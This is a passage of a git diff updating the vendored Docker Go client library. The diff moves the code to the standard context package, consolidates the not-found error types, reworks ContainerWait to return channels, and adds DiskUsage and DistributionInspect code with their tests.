 	resp, err := cli.delete(ctx, "/containers/"+containerID, query, nil)
 	ensureReaderClosed(resp)
-	return err
+	return wrapResponseError(err, resp, "container", containerID)
 }
diff --git a/vendor/github.com/docker/docker/client/container_remove_test.go b/vendor/github.com/docker/docker/client/container_remove_test.go
index 798c08b333..d94d831304 100644
--- a/vendor/github.com/docker/docker/client/container_remove_test.go
+++ b/vendor/github.com/docker/docker/client/container_remove_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
@@ -9,7 +10,8 @@ import (
 	"testing"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 func TestContainerRemoveError(t *testing.T) {
@@ -17,9 +19,16 @@ func TestContainerRemoveError(t *testing.T) {
 		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
 	}
 	err := client.ContainerRemove(context.Background(), "container_id", types.ContainerRemoveOptions{})
-	if err == nil || err.Error() != "Error response from daemon: Server error" {
-		t.Fatalf("expected a Server Error, got %v", err)
+	assert.Check(t, is.Error(err, "Error response from daemon: Server error"))
+}
+
+func TestContainerRemoveNotFoundError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusNotFound, "missing")),
 	}
+	err := client.ContainerRemove(context.Background(), "container_id", types.ContainerRemoveOptions{})
+	assert.Check(t, is.Error(err, "Error: No such container: container_id"))
+	assert.Check(t, IsErrNotFound(err))
 }
 
 func TestContainerRemove(t *testing.T) {
@@ -53,7 +62,5 @@ func TestContainerRemove(t *testing.T) {
 		RemoveVolumes: true,
 		Force:         true,
 	})
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.Check(t, err)
 }
diff --git a/vendor/github.com/docker/docker/client/container_rename.go b/vendor/github.com/docker/docker/client/container_rename.go
index 0e718da7c6..240fdf552b 100644
--- a/vendor/github.com/docker/docker/client/container_rename.go
+++ b/vendor/github.com/docker/docker/client/container_rename.go
@@ -1,9 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"net/url"
-
-	"golang.org/x/net/context"
 )
 
 // ContainerRename changes the name of a given container.
diff --git a/vendor/github.com/docker/docker/client/container_rename_test.go b/vendor/github.com/docker/docker/client/container_rename_test.go
index 732ebff5f7..42be609028 100644
--- a/vendor/github.com/docker/docker/client/container_rename_test.go
+++ b/vendor/github.com/docker/docker/client/container_rename_test.go
@@ -1,14 +1,13 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
 	"strings"
 	"testing"
-
-	"golang.org/x/net/context"
 )
 
 func TestContainerRenameError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/container_resize.go b/vendor/github.com/docker/docker/client/container_resize.go
index 66c3cc1940..a9d4c0c79a 100644
--- a/vendor/github.com/docker/docker/client/container_resize.go
+++ b/vendor/github.com/docker/docker/client/container_resize.go
@@ -1,11 +1,11 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"net/url"
 	"strconv"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 // ContainerResize changes the size of the tty for a container.
diff --git a/vendor/github.com/docker/docker/client/container_resize_test.go b/vendor/github.com/docker/docker/client/container_resize_test.go
index 5b2efecdce..3c10fd7e69 100644
--- a/vendor/github.com/docker/docker/client/container_resize_test.go
+++ b/vendor/github.com/docker/docker/client/container_resize_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
@@ -9,7 +10,6 @@ import (
 	"testing"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 func TestContainerResizeError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/container_restart.go b/vendor/github.com/docker/docker/client/container_restart.go
index 74d7455f02..41e421969f 100644
--- a/vendor/github.com/docker/docker/client/container_restart.go
+++ b/vendor/github.com/docker/docker/client/container_restart.go
@@ -1,11 +1,11 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"net/url"
 	"time"
 
 	timetypes "github.com/docker/docker/api/types/time"
-	"golang.org/x/net/context"
 )
 
 // ContainerRestart stops and starts a container again.
diff --git a/vendor/github.com/docker/docker/client/container_restart_test.go b/vendor/github.com/docker/docker/client/container_restart_test.go
index 8c3cfd6a6f..27e81da5d8 100644
--- a/vendor/github.com/docker/docker/client/container_restart_test.go
+++ b/vendor/github.com/docker/docker/client/container_restart_test.go
@@ -1,15 +1,14 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
 	"strings"
 	"testing"
 	"time"
-
-	"golang.org/x/net/context"
 )
 
 func TestContainerRestartError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/container_start.go b/vendor/github.com/docker/docker/client/container_start.go
index b1f08de416..c2e0b15dca 100644
--- a/vendor/github.com/docker/docker/client/container_start.go
+++ b/vendor/github.com/docker/docker/client/container_start.go
@@ -1,10 +1,9 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"net/url"
 
-	"golang.org/x/net/context"
-
 	"github.com/docker/docker/api/types"
 )
 
diff --git a/vendor/github.com/docker/docker/client/container_start_test.go b/vendor/github.com/docker/docker/client/container_start_test.go
index 5826fa8bc7..277c585caa 100644
--- a/vendor/github.com/docker/docker/client/container_start_test.go
+++ b/vendor/github.com/docker/docker/client/container_start_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -9,8 +10,6 @@ import (
 	"strings"
 	"testing"
 
-	"golang.org/x/net/context"
-
 	"github.com/docker/docker/api/types"
 )
 
diff --git a/vendor/github.com/docker/docker/client/container_stats.go b/vendor/github.com/docker/docker/client/container_stats.go
index 4758c66e32..6ef44c7748 100644
--- a/vendor/github.com/docker/docker/client/container_stats.go
+++ b/vendor/github.com/docker/docker/client/container_stats.go
@@ -1,10 +1,10 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"net/url"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 // ContainerStats returns near realtime stats for a given container.
diff --git a/vendor/github.com/docker/docker/client/container_stats_test.go b/vendor/github.com/docker/docker/client/container_stats_test.go
index 7414f135c3..d88596315c 100644
--- a/vendor/github.com/docker/docker/client/container_stats_test.go
+++ b/vendor/github.com/docker/docker/client/container_stats_test.go
@@ -1,14 +1,13 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
 	"strings"
 	"testing"
-
-	"golang.org/x/net/context"
 )
 
 func TestContainerStatsError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/container_stop.go b/vendor/github.com/docker/docker/client/container_stop.go
index b5418ae8c8..629d7ab64c 100644
--- a/vendor/github.com/docker/docker/client/container_stop.go
+++ b/vendor/github.com/docker/docker/client/container_stop.go
@@ -1,15 +1,20 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"net/url"
 	"time"
 
 	timetypes "github.com/docker/docker/api/types/time"
-	"golang.org/x/net/context"
 )
 
-// ContainerStop stops a container without terminating the process.
-// The process is blocked until the container stops or the timeout expires.
+// ContainerStop stops a container. In case the container fails to stop
+// gracefully within a time frame specified by the timeout argument,
+// it is forcefully terminated (killed).
+//
+// If the timeout is nil, the container's StopTimeout value is used, if set,
+// otherwise the engine default. A negative timeout value can be specified,
+// meaning no timeout, i.e. no forceful termination is performed.
 func (cli *Client) ContainerStop(ctx context.Context, containerID string, timeout *time.Duration) error {
 	query := url.Values{}
 	if timeout != nil {
diff --git a/vendor/github.com/docker/docker/client/container_stop_test.go b/vendor/github.com/docker/docker/client/container_stop_test.go
index c32cd691c4..e9af74525a 100644
--- a/vendor/github.com/docker/docker/client/container_stop_test.go
+++ b/vendor/github.com/docker/docker/client/container_stop_test.go
@@ -1,15 +1,14 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
 	"strings"
 	"testing"
 	"time"
-
-	"golang.org/x/net/context"
 )
 
 func TestContainerStopError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/container_top.go b/vendor/github.com/docker/docker/client/container_top.go
index 4e7270ea22..9c9fce7a04 100644
--- a/vendor/github.com/docker/docker/client/container_top.go
+++ b/vendor/github.com/docker/docker/client/container_top.go
@@ -1,17 +1,17 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 	"net/url"
 	"strings"
 
-	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
+	"github.com/docker/docker/api/types/container"
 )
 
 // ContainerTop shows process information from within a container.
-func (cli *Client) ContainerTop(ctx context.Context, containerID string, arguments []string) (types.ContainerProcessList, error) {
-	var response types.ContainerProcessList
+func (cli *Client) ContainerTop(ctx context.Context, containerID string, arguments []string) (container.ContainerTopOKBody, error) {
+	var response container.ContainerTopOKBody
 	query := url.Values{}
 	if len(arguments) > 0 {
 		query.Set("ps_args", strings.Join(arguments, " "))
diff --git a/vendor/github.com/docker/docker/client/container_top_test.go b/vendor/github.com/docker/docker/client/container_top_test.go
index 7802be063e..48daba7783 100644
--- a/vendor/github.com/docker/docker/client/container_top_test.go
+++ b/vendor/github.com/docker/docker/client/container_top_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -10,8 +11,7 @@ import (
 	"strings"
 	"testing"
 
-	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
+	"github.com/docker/docker/api/types/container"
 )
 
 func TestContainerTopError(t *testing.T) {
@@ -43,7 +43,7 @@ func TestContainerTop(t *testing.T) {
 				return nil, fmt.Errorf("args not set in URL query properly. Expected 'arg1 arg2', got %v", args)
 			}
 
-			b, err := json.Marshal(types.ContainerProcessList{
+			b, err := json.Marshal(container.ContainerTopOKBody{
 				Processes: [][]string{
 					{"p1", "p2"},
 					{"p3"},
diff --git a/vendor/github.com/docker/docker/client/container_unpause.go b/vendor/github.com/docker/docker/client/container_unpause.go
index 5c76211256..1d8f873169 100644
--- a/vendor/github.com/docker/docker/client/container_unpause.go
+++ b/vendor/github.com/docker/docker/client/container_unpause.go
@@ -1,6 +1,6 @@
-package client
+package client // import "github.com/docker/docker/client"
 
-import "golang.org/x/net/context"
+import "context"
 
 // ContainerUnpause resumes the process execution within a container
 func (cli *Client) ContainerUnpause(ctx context.Context, containerID string) error {
diff --git a/vendor/github.com/docker/docker/client/container_unpause_test.go b/vendor/github.com/docker/docker/client/container_unpause_test.go
index 2c42727191..000699190a 100644
--- a/vendor/github.com/docker/docker/client/container_unpause_test.go
+++ b/vendor/github.com/docker/docker/client/container_unpause_test.go
@@ -1,14 +1,13 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
 	"strings"
 	"testing"
-
-	"golang.org/x/net/context"
 )
 
 func TestContainerUnpauseError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/container_update.go b/vendor/github.com/docker/docker/client/container_update.go
index 5082f22dfa..14e7f23dfb 100644
--- a/vendor/github.com/docker/docker/client/container_update.go
+++ b/vendor/github.com/docker/docker/client/container_update.go
@@ -1,10 +1,10 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 
 	"github.com/docker/docker/api/types/container"
-	"golang.org/x/net/context"
 )
 
 // ContainerUpdate updates resources of a container
diff --git a/vendor/github.com/docker/docker/client/container_update_test.go b/vendor/github.com/docker/docker/client/container_update_test.go
index 715bb7ca23..41c6485ec8 100644
--- a/vendor/github.com/docker/docker/client/container_update_test.go
+++ b/vendor/github.com/docker/docker/client/container_update_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -10,7 +11,6 @@ import (
 	"testing"
 
 	"github.com/docker/docker/api/types/container"
-	"golang.org/x/net/context"
 )
 
 func TestContainerUpdateError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/container_wait.go b/vendor/github.com/docker/docker/client/container_wait.go
index 93212c70ee..6ab8c1da96 100644
--- a/vendor/github.com/docker/docker/client/container_wait.go
+++ b/vendor/github.com/docker/docker/client/container_wait.go
@@ -1,26 +1,83 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
-
-	"golang.org/x/net/context"
+	"net/url"
 
 	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/versions"
 )
 
-// ContainerWait pauses execution until a container exits.
-// It returns the API status code as response of its readiness.
-func (cli *Client) ContainerWait(ctx context.Context, containerID string) (int64, error) {
-	resp, err := cli.post(ctx, "/containers/"+containerID+"/wait", nil, nil, nil)
-	if err != nil {
-		return -1, err
+// ContainerWait waits until the specified container is in a certain state
+// indicated by the given condition, either "not-running" (default),
+// "next-exit", or "removed".
+//
+// If this client's API version is before 1.30, condition is ignored and
+// ContainerWait will return immediately with the two channels, as the server
+// will wait as if the condition were "not-running".
+//
+// If this client's API version is at least 1.30, ContainerWait blocks until
+// the request has been acknowledged by the server (with a response header),
+// then returns two channels on which the caller can wait for the exit status
+// of the container or an error if there was a problem either beginning the
+// wait request or in getting the response. This allows the caller to
+// synchronize ContainerWait with other calls, such as specifying a
+// "next-exit" condition before issuing a ContainerStart request.
+func (cli *Client) ContainerWait(ctx context.Context, containerID string, condition container.WaitCondition) (<-chan container.ContainerWaitOKBody, <-chan error) {
+	if versions.LessThan(cli.ClientVersion(), "1.30") {
+		return cli.legacyContainerWait(ctx, containerID)
 	}
-	defer ensureReaderClosed(resp)
 
-	var res container.ContainerWaitOKBody
-	if err := json.NewDecoder(resp.body).Decode(&res); err != nil {
-		return -1, err
+	resultC := make(chan container.ContainerWaitOKBody)
+	errC := make(chan error, 1)
+
+	query := url.Values{}
+	query.Set("condition", string(condition))
+
+	resp, err := cli.post(ctx, "/containers/"+containerID+"/wait", query, nil, nil)
+	if err != nil {
+		defer ensureReaderClosed(resp)
+		errC <- err
+		return resultC, errC
 	}
 
-	return res.StatusCode, nil
+	go func() {
+		defer ensureReaderClosed(resp)
+		var res container.ContainerWaitOKBody
+		if err := json.NewDecoder(resp.body).Decode(&res); err != nil {
+			errC <- err
+			return
+		}
+
+		resultC <- res
+	}()
+
+	return resultC, errC
+}
+
+// legacyContainerWait returns immediately and doesn't have an option to wait
+// until the container is removed.
+func (cli *Client) legacyContainerWait(ctx context.Context, containerID string) (<-chan container.ContainerWaitOKBody, <-chan error) {
+	resultC := make(chan container.ContainerWaitOKBody)
+	errC := make(chan error)
+
+	go func() {
+		resp, err := cli.post(ctx, "/containers/"+containerID+"/wait", nil, nil, nil)
+		if err != nil {
+			errC <- err
+			return
+		}
+		defer ensureReaderClosed(resp)
+
+		var res container.ContainerWaitOKBody
+		if err := json.NewDecoder(resp.body).Decode(&res); err != nil {
+			errC <- err
+			return
+		}
+
+		resultC <- res
+	}()
+
+	return resultC, errC
 }
diff --git a/vendor/github.com/docker/docker/client/container_wait_test.go b/vendor/github.com/docker/docker/client/container_wait_test.go
index 9300bc0a54..11a9203ddc 100644
--- a/vendor/github.com/docker/docker/client/container_wait_test.go
+++ b/vendor/github.com/docker/docker/client/container_wait_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -12,20 +13,20 @@ import (
 	"time"
 
 	"github.com/docker/docker/api/types/container"
-
-	"golang.org/x/net/context"
 )
 
 func TestContainerWaitError(t *testing.T) {
 	client := &Client{
 		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
 	}
-	code, err := client.ContainerWait(context.Background(), "nothing")
-	if err == nil || err.Error() != "Error response from daemon: Server error" {
-		t.Fatalf("expected a Server Error, got %v", err)
-	}
-	if code != -1 {
-		t.Fatalf("expected a status code equal to '-1', got %d", code)
+	resultC, errC := client.ContainerWait(context.Background(), "nothing", "")
+	select {
+	case result := <-resultC:
+		t.Fatalf("expected to not get a wait result, got %d", result.StatusCode)
+	case err := <-errC:
+		if err.Error() != "Error response from daemon: Server error" {
+			t.Fatalf("expected a Server Error, got %v", err)
+		}
 	}
 }
 
@@ -49,12 +50,14 @@ func TestContainerWait(t *testing.T) {
 		}),
 	}
 
-	code, err := client.ContainerWait(context.Background(), "container_id")
-	if err != nil {
+	resultC, errC := client.ContainerWait(context.Background(), "container_id", "")
+	select {
+	case err := <-errC:
 		t.Fatal(err)
-	}
-	if code != 15 {
-		t.Fatalf("expected a status code equal to '15', got %d", code)
+	case result := <-resultC:
+		if result.StatusCode != 15 {
+			t.Fatalf("expected a status code equal to '15', got %d", result.StatusCode)
+		}
 	}
 }
 
@@ -63,8 +66,8 @@ func ExampleClient_ContainerWait_withTimeout() {
 	defer cancel()
 
 	client, _ := NewEnvClient()
-	_, err := client.ContainerWait(ctx, "container_id")
-	if err != nil {
+	_, errC := client.ContainerWait(ctx, "container_id", "")
+	if err := <-errC; err != nil {
 		log.Fatal(err)
 	}
 }
diff --git a/vendor/github.com/docker/docker/client/disk_usage.go b/vendor/github.com/docker/docker/client/disk_usage.go
index 03c80b39af..8eb30eb5de 100644
--- a/vendor/github.com/docker/docker/client/disk_usage.go
+++ b/vendor/github.com/docker/docker/client/disk_usage.go
@@ -1,11 +1,11 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 	"fmt"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 // DiskUsage requests the current data usage from the daemon
diff --git a/vendor/github.com/docker/docker/client/disk_usage_test.go b/vendor/github.com/docker/docker/client/disk_usage_test.go
new file mode 100644
index 0000000000..3968f75e62
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/disk_usage_test.go
@@ -0,0 +1,55 @@
+package client // import "github.com/docker/docker/client"
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+)
+
+func TestDiskUsageError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, err := client.DiskUsage(context.Background())
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestDiskUsage(t *testing.T) {
+	expectedURL := "/system/df"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+
+			du := types.DiskUsage{
+				LayersSize: int64(100),
+				Images:     nil,
+				Containers: nil,
+				Volumes:    nil,
+			}
+
+			b, err := json.Marshal(du)
+			if err != nil {
+				return nil, err
+			}
+
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(b)),
+			}, nil
+		}),
+	}
+	if _, err := client.DiskUsage(context.Background()); err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/distribution_inspect.go b/vendor/github.com/docker/docker/client/distribution_inspect.go
new file mode 100644
index 0000000000..7245bbeeda
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/distribution_inspect.go
@@ -0,0 +1,38 @@
+package client // import "github.com/docker/docker/client"
+
+import (
+	"context"
+	"encoding/json"
+	"net/url"
+
+	registrytypes "github.com/docker/docker/api/types/registry"
+)
+
+// DistributionInspect returns the image digest with full Manifest
+func (cli *Client) DistributionInspect(ctx context.Context, image, encodedRegistryAuth string) (registrytypes.DistributionInspect, error) {
+	// Contact the registry to retrieve digest and platform information
+	var distributionInspect registrytypes.DistributionInspect
+	if image == "" {
+		return distributionInspect, objectNotFoundError{object: "distribution", id: image}
+	}
+
+	if err := cli.NewVersionError("1.30", "distribution inspect"); err != nil {
+		return distributionInspect, err
+	}
+	var headers map[string][]string
+
+	if encodedRegistryAuth != "" {
+		headers = map[string][]string{
+			"X-Registry-Auth": {encodedRegistryAuth},
+		}
+	}
+
+	resp, err := cli.get(ctx, "/distribution/"+image+"/json", url.Values{}, headers)
+	if err != nil {
+		return distributionInspect, err
+	}
+
+	err = json.NewDecoder(resp.body).Decode(&distributionInspect)
+	ensureReaderClosed(resp)
+	return distributionInspect, err
+}
diff --git a/vendor/github.com/docker/docker/client/distribution_inspect_test.go b/vendor/github.com/docker/docker/client/distribution_inspect_test.go
new file mode 100644
index 0000000000..a23d5f55d5
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/distribution_inspect_test.go
@@ -0,0 +1,32 @@
+package client // import "github.com/docker/docker/client"
+
+import (
+	"context"
+	"net/http"
+	"testing"
+
+	"github.com/pkg/errors"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestDistributionInspectUnsupported(t *testing.T) {
+	client := &Client{
+		version: "1.29",
+		client:  &http.Client{},
+	}
+	_, err := client.DistributionInspect(context.Background(), "foobar:1.0", "")
+	assert.Check(t, is.Error(err, `"distribution inspect" requires API version 1.30, but the Docker daemon API version is 1.29`))
+}
+
+func TestDistributionInspectWithEmptyID(t *testing.T) {
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			return nil, errors.New("should not make request")
+		}),
+	}
+	_, err := client.DistributionInspect(context.Background(), "", "")
+	if !IsErrNotFound(err) {
+		t.Fatalf("Expected NotFoundError, got %v", err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/errors.go b/vendor/github.com/docker/docker/client/errors.go
index bf6923f134..0461af329d 100644
--- a/vendor/github.com/docker/docker/client/errors.go
+++ b/vendor/github.com/docker/docker/client/errors.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"fmt"
+	"net/http"
 
 	"github.com/docker/docker/api/types/versions"
 	"github.com/pkg/errors"
@@ -36,95 +37,37 @@ type notFound interface {
 	NotFound() bool // Is the error a NotFound error
 }
 
-// IsErrNotFound returns true if the error is caused with an
-// object (image, container, network, volume, …) is not found in the docker host.
+// IsErrNotFound returns true if the error is a NotFound error, which is returned
+// by the API when some object is not found.
 func IsErrNotFound(err error) bool {
 	te, ok := err.(notFound)
 	return ok && te.NotFound()
 }
 
-// imageNotFoundError implements an error returned when an image is not in the docker host.
-type imageNotFoundError struct {
-	imageID string
+type objectNotFoundError struct {
+	object string
+	id     string
 }
 
-// NotFound indicates that this error type is of NotFound
-func (e imageNotFoundError) NotFound() bool {
+func (e objectNotFoundError) NotFound() bool {
 	return true
 }
 
-// Error returns a string representation of an imageNotFoundError
-func (e imageNotFoundError) Error() string {
-	return fmt.Sprintf("Error: No such image: %s", e.imageID)
+func (e objectNotFoundError) Error() string {
+	return fmt.Sprintf("Error: No such %s: %s", e.object, e.id)
 }
 
-// IsErrImageNotFound returns true if the error is caused
-// when an image is not found in the docker host.
-func IsErrImageNotFound(err error) bool {
-	return IsErrNotFound(err)
-}
-
-// containerNotFoundError implements an error returned when a container is not in the docker host.
-type containerNotFoundError struct {
-	containerID string
-}
-
-// NotFound indicates that this error type is of NotFound
-func (e containerNotFoundError) NotFound() bool {
-	return true
-}
-
-// Error returns a string representation of a containerNotFoundError
-func (e containerNotFoundError) Error() string {
-	return fmt.Sprintf("Error: No such container: %s", e.containerID)
-}
-
-// IsErrContainerNotFound returns true if the error is caused
-// when a container is not found in the docker host.
-func IsErrContainerNotFound(err error) bool {
-	return IsErrNotFound(err)
-}
-
-// networkNotFoundError implements an error returned when a network is not in the docker host.
-type networkNotFoundError struct {
-	networkID string
-}
-
-// NotFound indicates that this error type is of NotFound
-func (e networkNotFoundError) NotFound() bool {
-	return true
-}
-
-// Error returns a string representation of a networkNotFoundError
-func (e networkNotFoundError) Error() string {
-	return fmt.Sprintf("Error: No such network: %s", e.networkID)
-}
-
-// IsErrNetworkNotFound returns true if the error is caused
-// when a network is not found in the docker host.
-func IsErrNetworkNotFound(err error) bool {
-	return IsErrNotFound(err)
-}
-
-// volumeNotFoundError implements an error returned when a volume is not in the docker host.
-type volumeNotFoundError struct {
-	volumeID string
-}
-
-// NotFound indicates that this error type is of NotFound
-func (e volumeNotFoundError) NotFound() bool {
-	return true
-}
-
-// Error returns a string representation of a volumeNotFoundError
-func (e volumeNotFoundError) Error() string {
-	return fmt.Sprintf("Error: No such volume: %s", e.volumeID)
-}
-
-// IsErrVolumeNotFound returns true if the error is caused
-// when a volume is not found in the docker host.
-func IsErrVolumeNotFound(err error) bool {
-	return IsErrNotFound(err)
+func wrapResponseError(err error, resp serverResponse, object, id string) error {
+	switch {
+	case err == nil:
+		return nil
+	case resp.statusCode == http.StatusNotFound:
+		return objectNotFoundError{object: object, id: id}
+	case resp.statusCode == http.StatusNotImplemented:
+		return notImplementedError{message: err.Error()}
+	default:
+		return err
+	}
 }
 
 // unauthorizedError represents an authorization error in a remote registry.
@@ -144,72 +87,6 @@ func IsErrUnauthorized(err error) bool {
 	return ok
 }
 
-// nodeNotFoundError implements an error returned when a node is not found.
-type nodeNotFoundError struct {
-	nodeID string
-}
-
-// Error returns a string representation of a nodeNotFoundError
-func (e nodeNotFoundError) Error() string {
-	return fmt.Sprintf("Error: No such node: %s", e.nodeID)
-}
-
-// NotFound indicates that this error type is of NotFound
-func (e nodeNotFoundError) NotFound() bool {
-	return true
-}
-
-// IsErrNodeNotFound returns true if the error is caused
-// when a node is not found.
-func IsErrNodeNotFound(err error) bool {
-	_, ok := err.(nodeNotFoundError)
-	return ok
-}
-
-// serviceNotFoundError implements an error returned when a service is not found.
-type serviceNotFoundError struct {
-	serviceID string
-}
-
-// Error returns a string representation of a serviceNotFoundError
-func (e serviceNotFoundError) Error() string {
-	return fmt.Sprintf("Error: No such service: %s", e.serviceID)
-}
-
-// NotFound indicates that this error type is of NotFound
-func (e serviceNotFoundError) NotFound() bool {
-	return true
-}
-
-// IsErrServiceNotFound returns true if the error is caused
-// when a service is not found.
-func IsErrServiceNotFound(err error) bool {
-	_, ok := err.(serviceNotFoundError)
-	return ok
-}
-
-// taskNotFoundError implements an error returned when a task is not found.
-type taskNotFoundError struct {
-	taskID string
-}
-
-// Error returns a string representation of a taskNotFoundError
-func (e taskNotFoundError) Error() string {
-	return fmt.Sprintf("Error: No such task: %s", e.taskID)
-}
-
-// NotFound indicates that this error type is of NotFound
-func (e taskNotFoundError) NotFound() bool {
-	return true
-}
-
-// IsErrTaskNotFound returns true if the error is caused
-// when a task is not found.
-func IsErrTaskNotFound(err error) bool {
-	_, ok := err.(taskNotFoundError)
-	return ok
-}
-
 type pluginPermissionDenied struct {
 	name string
 }
@@ -225,54 +102,31 @@ func IsErrPluginPermissionDenied(err error) bool {
 	return ok
 }
 
-// NewVersionError returns an error if the APIVersion required
-// if less than the current supported version
-func (cli *Client) NewVersionError(APIrequired, feature string) error {
-	if versions.LessThan(cli.version, APIrequired) {
-		return fmt.Errorf("%q requires API version %s, but the Docker server is version %s", feature, APIrequired, cli.version)
-	}
-	return nil
-}
-
-// secretNotFoundError implements an error returned when a secret is not found.
-type secretNotFoundError struct {
-	name string
-}
-
-// Error returns a string representation of a secretNotFoundError
-func (e secretNotFoundError) Error() string {
-	return fmt.Sprintf("Error: no such secret: %s", e.name)
-}
-
-// NoFound indicates that this error type is of NotFound
-func (e secretNotFoundError) NotFound() bool {
-	return true
+type notImplementedError struct {
+	message string
 }
 
-// IsErrSecretNotFound returns true if the error is caused
-// when a secret is not found.
-func IsErrSecretNotFound(err error) bool {
-	_, ok := err.(secretNotFoundError)
-	return ok
-}
-
-// pluginNotFoundError implements an error returned when a plugin is not in the docker host.
-type pluginNotFoundError struct {
-	name string
+func (e notImplementedError) Error() string {
+	return e.message
 }
 
-// NotFound indicates that this error type is of NotFound
-func (e pluginNotFoundError) NotFound() bool {
+func (e notImplementedError) NotImplemented() bool {
 	return true
 }
 
-// Error returns a string representation of a pluginNotFoundError
-func (e pluginNotFoundError) Error() string {
-	return fmt.Sprintf("Error: No such plugin: %s", e.name)
+// IsErrNotImplemented returns true if the error is a NotImplemented error.
+// This is returned by the API when a requested feature has not been
+// implemented.
+func IsErrNotImplemented(err error) bool {
+	te, ok := err.(notImplementedError)
+	return ok && te.NotImplemented()
 }
 
-// IsErrPluginNotFound returns true if the error is caused
-// when a plugin is not found in the docker host.
-func IsErrPluginNotFound(err error) bool {
-	return IsErrNotFound(err)
+// NewVersionError returns an error if the APIVersion required
+// if less than the current supported version
+func (cli *Client) NewVersionError(APIrequired, feature string) error {
+	if cli.version != "" && versions.LessThan(cli.version, APIrequired) {
+		return fmt.Errorf("%q requires API version %s, but the Docker daemon API version is %s", feature, APIrequired, cli.version)
+	}
+	return nil
 }
diff --git a/vendor/github.com/docker/docker/client/events.go b/vendor/github.com/docker/docker/client/events.go
index af47aefa74..6e56538955 100644
--- a/vendor/github.com/docker/docker/client/events.go
